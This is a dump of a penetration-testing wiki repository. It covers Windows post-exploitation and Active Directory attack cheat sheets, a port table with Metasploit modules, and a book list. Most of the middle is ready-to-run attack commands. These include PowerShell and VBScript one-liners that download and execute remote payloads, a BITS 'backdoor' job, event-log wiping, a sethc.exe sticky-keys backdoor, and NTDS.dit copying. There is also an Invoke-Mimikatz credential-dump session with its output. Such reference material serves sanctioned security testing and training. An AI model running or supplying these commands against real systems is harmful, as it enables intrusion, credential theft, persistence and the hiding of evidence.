|6667|tcp|ircd backdoor|msf > use exploit/unix/irc/unreal_ircd_3281_backdoor|
|6881||BitTorrent||
|6969||TFTP,BitTorrent||
|7001|tcp|weblogic||
|8080|tcp|jenkins|Jenkins Script Console (/script):<br>println "cmd.exe /c dir".execute().text<br><br>msf > use auxiliary/scanner/http/jenkins_enum<br>msf > use exploit/multi/http/jenkins_script_console|
|8083|tcp|vestacp||
|8089|tcp|jboss||
|8101|tcp|apache karaf||
|8180|tcp|apache tomcat|msf > use exploit/multi/http/tomcat_mgr_deploy|
|8443|tcp|https||
|8554|tcp|rtsp||
|8649|tcp|ganglia||
|9009|tcp|Julia||
|9151|tcp|Tor Control||
|9160||Apache Cassandra||
|9200|tcp|elasticsearch|msf > use exploit/multi/elasticsearch/search_groovy_script|
|9418|tcp|git||
|10000|tcp|virtualmin/webmin||
|11211|tcp|memcache|msf > use auxiliary/gather/memcached_extractor<br>$ nc x.x.x.x 11211<br>stats|
|13579||Media Player Classic web interface||
|15672|tcp|rabbitmq|http login - guest/guest|
|17185||VxWorks WDBRPC||
|18083|tcp|vbox server||
|27017|tcp|mongodb|msf > use auxiliary/scanner/mongodb/mongodb_login<br>$ mongo host:port/database<br>MongoDB shell version: 2.6.12<br>> help|
|28017|tcp|mongodb||
|37777||Dahua DVR||
|44818||EtherNet/IP||
|49153||WeMo Link||
|50000|tcp|sap||
|50030|tcp|hadoop||
|50070|tcp|hadoop||
|51106||Deluge (HTTP)||
|54138||Toshiba PoS||
|55553||Metasploit||
|55554||Metasploit||
|62078||Apple iDevice||
|64738||Mumble||

# Links

1. http://www.rfc-editor.org/search/rfc_search.php
2. http://packetlife.net/
3. https://www.leanpub.com/shodan
--------------------------------------------------------------------------------
/4.Post-Exploitation/README.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Post Exploitation - Windows

Post exploitation is a critical component in any penetration test. This is where you differentiate yourself from the average, run-of-the-mill hacker and actually provide valuable information and intelligence from your penetration test. Post exploitation targets specific systems, identifies critical infrastructure, and targets information or data that the company values most and that it has attempted to secure. When you exploit one system after another, you are trying to demonstrate attacks that would have the greatest business impact.

When attacking systems in `post exploitation`, you should take the time to determine what the various systems do and their different user roles. For example, suppose you compromise a domain infrastructure system and you’re running as an enterprise administrator or have domain administrative-level rights. You might be king of the domain, but what about the systems that communicate with Active Directory? What about the main financial application that is used to pay employees? Could you compromise that system, and then, on the next pay cycle, have it route all the money out of the company to an offshore account?
How about the target’s intellectual property?

Suppose, for example, that your client is a large software development shop that ships custom-coded applications to customers for use in manufacturing environments. Can you backdoor their source code and essentially compromise all of their customers? What would that do to harm their brand credibility?

`Post exploitation` is one of those tricky scenarios in which you must take the time to learn what information is available to you and then use that information to your benefit. An attacker would generally spend a significant amount of time in a compromised system doing the same. Think like a malicious attacker: be creative, adapt quickly, and rely on your wits instead of automated tools.

## Remote Management

|**Command**|**Description**|
|:----------|:--------------|
|NET USE \\\\`ip`\ipc$ `password` /user:`username`|Make an IPC$ connection to the remote host; if it succeeds you can view, query and so on, within the privileges of that account.|
|NET USE z: \\\\`ip`\\`share`$ `password` /user:`username`|Map a remote share as local drive z:|
|systeminfo /S `ComputerName` /U `username` /P `password`|Displays operating system configuration information for a local or remote machine, including service pack levels.|
|tasklist /S `SERVER` /U `DOMAIN\username` /P `password`|Displays a list of currently running processes on the remote machine.|
|taskkill /S `SERVER` /U `DOMAIN\username` /P `password` /PID `pid`|Kill a process on the remote server.|
|powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"|Download a script from a remote server and execute it in memory.|
|powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"|Download a file from a remote server.|
|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1|Execute `test.ps1` on localhost|
|bitsadmin /transfer `systemrepair` /download /priority `normal` http://path/to/file c:\path\local\file|Create a BITS job called `systemrepair` to download a file from a remote server.|
|echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs<br><br>`cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename`|Download a file with VBScript. The `^` carets escape the double quotes for cmd.exe so that the line reaches the file intact.|
|echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs<br><br>`cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt`|Download and execute a Metasploit VBS payload.|
|PsExec.exe \\\\192.168.206.145 -accepteula -u `username` -p `password` `cmd.exe /c ver`|Run a command on the remote Windows host and return its output.|
|wmic /node:`SERVER` /user:`DOMAIN\username` /password:`password` process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"|Create a new process on the remote server. No command output is returned, hence the redirect to a file.|


## PROXY

|**Command**|**Description**|
|:----------|:--------------|
|NETSH INTERFACE portproxy add v4tov4 listenport=`LPORT` connectaddress=`RHOST` connectport=`RPORT` [listenaddress=`LHOST` protocol=tcp]|Forward connections arriving on the local port to remoteaddr:remoteport.|
|set http_proxy=http://your_proxy:your_port<br>set http_proxy=http://username:password@your_proxy:your_port<br>set https_proxy=https://your_proxy:your_port<br>set https_proxy=https://username:password@your_proxy:your_port|Use a proxy from the command prompt (honoured by tools that read these environment variables).|

## Whitelist

|**Command**|**Description**|
|:----------|:--------------|
|NETSH FIREWALL show allowedprogram|Show the allowed-programs configuration for the Domain/Standard profile.|
|NETSH FIREWALL add allowedprogram `C:\Windows\system32\cmd.exe` `cmd` enable|Add a program to the firewall allowed-program whitelist.|
|NETSH FIREWALL delete allowedprogram `cmd`|Delete an item from the allowed-program whitelist; the program path works as well.|
|NETSH FIREWALL show portopening|Show the opened-port configuration for the Domain/Standard profile.|
|NETSH FIREWALL add portopening tcp `4444` `bindshell` enable all|Open tcp port 4444 in the firewall (for example for a bind shell).|

## Service

|**Command**|**Description**|
|:----------|:--------------|
|sc create `servicename` type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start `servicename`|Create a service that runs an arbitrary command as LocalSystem.|

## Scheduler


|**Command**|**Description**|
|:----------|:--------------|
|net use \\\\`IP`\ipc$ `password` /user:`username`<br>at \\\\`ComputerName` `time` "command"|The AT command schedules commands and programs to run on a computer at a specified time and date. Use `net time [/domain]` to show the current time.|

## Logs

|**Command**|**Description**|
|:----------|:--------------|
|del %WINDIR%\*.log /a /s /q /f|Deletes all *.log files under %WINDIR%.|
|wevtutil el|Lists the event logs the system keeps.|
|for /f %a in ('wevtutil el') do @wevtutil cl "%a"|Clears every event log returned by `wevtutil el`.|
|powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security|Clear the named event logs.|

Clearing a log is itself logged: the Security log records event ID 1102 and the System log event ID 104, and monitoring that forwards events off the host will already have the originals.

# Links

1. [**How to execute metasploit vbs payload in cmd.exe ?**](https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/Execute_metasploit_vbs_payload_in_cmd_shell.md)
2. [**Hacking Windows Active Directory**](https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/Hacking_Windows_Active_Directory.md)
3. [**How to dump windows 2012 credentials ?**](https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/How-to-dump-windows2012-credentials.md)
4. [**How to use PowerSploit Invoke-Mimikatz to dump credentials ?**](https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/PowerSploit_Invoke-Mimikatz_in_cmd.md)
5.
[**How to use vssadmin ?**]( https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/How-to-use-vssadmin.md) 80 | -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/How-to-use-vssadmin.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | ## Vssadmin 6 | 7 | Applies To: Windows Server 2003, Windows Server 2008, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012, Windows 8 8 | 9 | | **Command** | **Description** | 10 | |:----------|:---------------| 11 | |Vssadmin add shadowstorage | Adds a volume shadow copy storage association.| 12 | | Vssadmin create shadow | Creates a new volume shadow copy. | 13 | | Vssadmin delete shadows | Deletes volume shadow copies. | 14 | | Vssadmin delete shadowstorage | Deletes volume shadow copy storage associations. | 15 | | Vssadmin list providers | Lists registered volume shadow copy providers. | 16 | |Vssadmin list shadows|Lists existing volume shadow copies.| 17 | |Vssadmin list shadowstorage|Lists all shadow copy storage associations on the system.| 18 | |Vssadmin list volumes|Lists volumes that are eligible for shadow copies.| 19 | |Vssadmin list writers|Lists all subscribed volume shadow copy writers on the system.| 20 | |Vssadmin resize shadowstorage|Resizes the maximum size for a shadow copy storage association.| 21 | 22 | ## With Administrator Privilege 23 | 24 | ``` 25 | PS C:\Users\Administrator\Desktop>vssadmin List Shadows 26 | vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 27 | (C) Copyright 2001-2005 Microsoft Corp. 28 | 29 | Error: You don't have the correct permissions to run this command. Please run t 30 | his utility from a command 31 | window that has elevated administrator privileges. 

```

## List Shadows

```
C:\Windows\system32>vssadmin List Shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query.
```

### Create Shadow

```
C:\Windows\system32>vssadmin Create Shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {153b6835-be81-45ed-bd01-2edbf4f61a85}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
```

### Copy Files

```
PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\

C:\Windows\system32>vssadmin List Shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {7b37f005-c738-450c-83cd-ad2f237f2b28}
   Contained 1 shadow copies at creation time: 11/5/2016 1:19:40 AM
      Shadow Copy ID: {153b6835-be81-45ed-bd01-2edbf4f61a85}
         Original Volume: (C:)\\?\Volume{be4f748a-a19f-11e6-a5bb-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: SERVER2008.thegeekstuff.com
         Service Machine: SERVER2008.thegeekstuff.com
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
```


### Delete Shadows

```
C:\Windows\system32>vssadmin Delete Shadows /For=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Do you really want to delete 1 shadow copies (Y/N): [N]? Y

Successfully deleted 1 shadow copies.
```

----


## Invoke-NinjaCopy

```
PS C:\Users\Administrator> Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -ComputerName SERVER -localDestination "C:\temp\SYSTEM"
PS C:\Users\Administrator> Invoke-NinjaCopy -Path "C:\Windows\NTDS\NTDS.dit" -ComputerName SERVER -localDestination "C:\temp\NTDS.dit"
```

## References

1. https://technet.microsoft.com/en-us/library/cc754968(v=ws.11).aspx
2. [Tutorial for NTDS goodness (VSSADMIN, WMIS, NTDS.dit, SYSTEM)](https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/)
3. [How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller](https://adsecurity.org/?p=451)
4. https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
5. https://github.com/clymb3r/PowerShell/blob/master/Invoke-NinjaCopy/Invoke-NinjaCopy.ps1

--------------------------------------------------------------------------------
/4.Post-Exploitation/Windows_ActiveDirectory/PowerSploit_Invoke-Mimikatz_in_cmd.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

```
C:\Windows\system32>powershell -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Dec 14 2015 18:03:07)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 17 modules * * */


mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 446842 (00000000:0006d17a)
Session           : Interactive from 1
User Name         : test
Domain            : lab
Logon Server      : LAB
Logon Time        : 10/14/2016 6:38:14 AM
SID               : S-1-5-21-2035202921-1308571849-2301429434-1000
        msv :
         [00000003] Primary
         * Username   : test
         * Domain     : lab
         * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
         * SHA1       : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
         [00010000] CredentialKeys
         * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
         * SHA1       : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
        tspkg :
         * Username   : test
         * Domain     : lab
         * Password   : password
        wdigest :
         * Username   : test
         * Domain     : lab
         * Password   : password
        kerberos :
         * Username   : test
         * Domain     : lab
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 446819 (00000000:0006d163)
Session           : Interactive from 1
User Name         : test
Domain            : lab
Logon Server      : LAB
Logon Time        : 10/14/2016 6:38:14 AM
SID               : S-1-5-21-2035202921-1308571849-2301429434-1000
        msv :
         [00010000] CredentialKeys
         * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
         * SHA1       : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
         [00000003] Primary
         * Username   : test
         * Domain     : lab
         * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
         * SHA1       : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
        tspkg :
         * Username   : test
         * Domain     : lab
         * Password   : password
        wdigest :
         * Username   : test
         * Domain     : lab
         * Password   : password
        kerberos :
         * Username   : test
         * Domain     : lab
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 10/14/2016 6:37:59 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : LAB$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 10/14/2016 6:37:59 AM
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username   : LAB$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : lab$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 54335 (00000000:0000d43f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 10/14/2016 6:37:58 AM
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : LAB$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 10/14/2016 6:37:58 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : LAB$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : lab$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

mimikatz(powershell) # exit
Bye!
```

--------------------------------------------------------------------------------
/4.Post-Exploitation/Windows_ActiveDirectory/Windows_AD_commands.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

```
net view
net view /domain
net view /domain:DOMAINNAME
net view \\domain-control
net user
net user /domain
net localgroup administrators
net localgroup administrators /domain
net group /domain
net group "Domain Admins" /domain
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
net group "Group Policy Creator Owners" /domain
net time /domain
net config
net session
net use \\ip\ipc$ password /user:username
net share
net accounts /domain
```

```
wmic useraccount
wmic useraccount LIST FULL
wmic useraccount LIST BRIEF
wmic useraccount LIST STATUS
wmic startup
wmic share
wmic service
wmic process where name="[PROCESS]" call terminate
wmic process where ProcessId="[PID]" call terminate
wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
wmic qfe get hotfixid
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber
wmic bios
wmic bios LIST FULL
```

```
netsh firewall show conf
netsh firewall set service type = remotedesktop mode = enable
netsh firewall add allowedprogram C:\nltest.exe mltest enable
netsh firewall add portopening tcp 2482 lt enable all
netsh int portproxy v4tov4 listenport=80 connecthost=[AttackerIP] connectport=80
netsh wlan show profiles
netsh wlan export profile folder=. key=clear
netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid= key= keyUsage=persistent|temporary
netsh wlan [start|stop] hostednetwork
```

```
netstat -ano
netstat -ano -p tcp
netstat -ano -p udp
```

```
tasklist /V
tasklist /M
tasklist /FI "IMAGENAME eq cmd.exe"
tasklist /FI "PID eq 4060"
```

```
ipconfig /all
ipconfig /displaydns
```


```
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"
powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"
```

```
bitsadmin /create backdoor
bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe
bitsadmin /SETMINRETRYDELAY 88000
bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL
bitsadmin /getnotifycmdline backdoor
bitsadmin /listfiles backdoor
bitsadmin /RESUME backdoor # Run the backdoor
```

```
for /f %a in ('wevtutil el') do @wevtutil cl "%a"
del %WINDIR%\*.log /a /s /q /f
```

```
sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys
```

```
route print
arp -a
qwinsta
qprocess
nbtstat -A ip
fsutil fsinfo drivers
wmic volume LIST BRIEF
systeminfo
at 13:20 /interactive cmd
type C:\Windows\system32\demo.txt
gpresult /Z
dir /b /s | find /I "password"
FOR /F %f in ('dir /b /s C:\') do find /I "password" %f
```

```
Replacing file as: sethc.exe
@echo off
c: > nul\cd\ > nul\cd %SYSTEMROOT%\System32\ > nul
if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul
cmd %SYSTEMROOT%\System32\cmdsys\ > nul
copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul
copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul
copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul
copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul
exit
```


## References

1. http://pwnwiki.io/

--------------------------------------------------------------------------------
/5.Privilege-Escalation/README.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Privilege Escalation

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

|**Escalation Category**|**Bookmarks**|
|:------------|:-----------|
|Password Attacks||
|Privilege Escalation Media||
|Protocol Analysis||
|Spoofing Attacks||

# Links

1. https://en.wikipedia.org/wiki/Privilege_escalation

--------------------------------------------------------------------------------
/6.Maintaining-Access/README.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Maintaining Access

|**Category**|**Bookmarks**|
|:-----------|:------------|
|OS Backdoors||
|Tunneling||
|Web Backdoors||


1. http://resources.infosecinstitute.com/penetration-testing-maintaining-access/

--------------------------------------------------------------------------------
/7.Reporting/README.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) >

----

# Reporting

*Reporting* is by far the most important element of a penetration test. You will use reports to communicate what you did, how you did it, and, most important, how the organization should fix the vulnerabilities discovered during the penetration test.


# Links

1. http://www.pentest-standard.org/index.php/Reporting
2. https://github.com/juliocesarfort/public-pentesting-reports
3. https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf

--------------------------------------------------------------------------------
/Books/README.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Books


## Penetration Testing Books
* [The Art of Exploitation by Jon Erickson, 2008](https://www.nostarch.com/hacking2.htm)
* [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://www.nostarch.com/metasploit)
* [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://www.nostarch.com/pentesting)
* [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/)
* [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/)
* [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1)
* [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4)
* [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
* [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6)
* [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/)
* [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677)
* [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE)
* [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362)
* [Bug Hunter's Diary by Tobias Klein, 2011](https://www.nostarch.com/bughunter)
* [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)
* [How to Hack Like a Pornstar](https://books2read.com/u/bWzdBx) - A step by step process for breaking into a BANK, Sparc Flow, 2017
* [How to Hack Like a God](https://books2read.com/u/mBPGOy) - Master the secrets of hacking through real life scenarios, Sparc Flow, 2017
* [How to Hack Like a Legend](https://amzn.to/2uWh1Up) - A hacker’s tale breaking into a secretive offshore company, Sparc Flow, 2018


## Hackers Handbook Series
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)

## Defensive Development

* [Holistic Info-Sec for Web Developers (bundle)](https://leanpub.com/b/holisticinfosecforwebdevelopers)

## Network Analysis Books
* [Nmap Network Scanning by Gordon Fyodor Lyon, 2009](https://nmap.org/book/)
* [Practical Packet Analysis by Chris Sanders, 2011](https://www.nostarch.com/packet2.htm)
* [Wireshark Network Analysis by Laura Chappell & Gerald Combs, 2012](http://www.wiresharkbook.com/)
* [Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012](http://www.amazon.com/Network-Forensics-Tracking-Hackers-Cyberspace-ebook/dp/B008CG8CYU/)
* [Network Security Assessment by Chris McNab](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B0043EWUR0)

## Reverse Engineering Books
* [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/)
* [Hacking the Xbox by Andrew Huang, 2003](https://www.nostarch.com/xbox.htm)
* [The IDA Pro Book by Chris Eagle, 2011](https://www.nostarch.com/idapro2.htm)
* [Practical Reverse Engineering by Bruce Dang et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118787315.html)
* [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071832386)

## Malware Analysis Books
* [Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012](https://www.nostarch.com/malware)
* [The Art of Memory Forensics by Michael Hale Ligh et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118825098.html)
* [Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470613033.html)
* [How to Investigate Like a Rockstar](https://books2read.com/u/4jDWoZ) - Live a real crisis to master the secrets of forensic analysis, Sparc Flow, 2017

## Windows Books
* [Windows Internals by Mark Russinovich et al., 2012](http://www.amazon.com/Windows-Internals-Part-Developer-Reference/dp/0735648735/)

## Social Engineering Books
* [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0471237124.html)
* [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764569597.html)
* [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/)
* [No Tech Hacking by Johnny Long & Jack Wiles, 2008](https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7)
* [Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470639539.html)
* [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118608577.html)
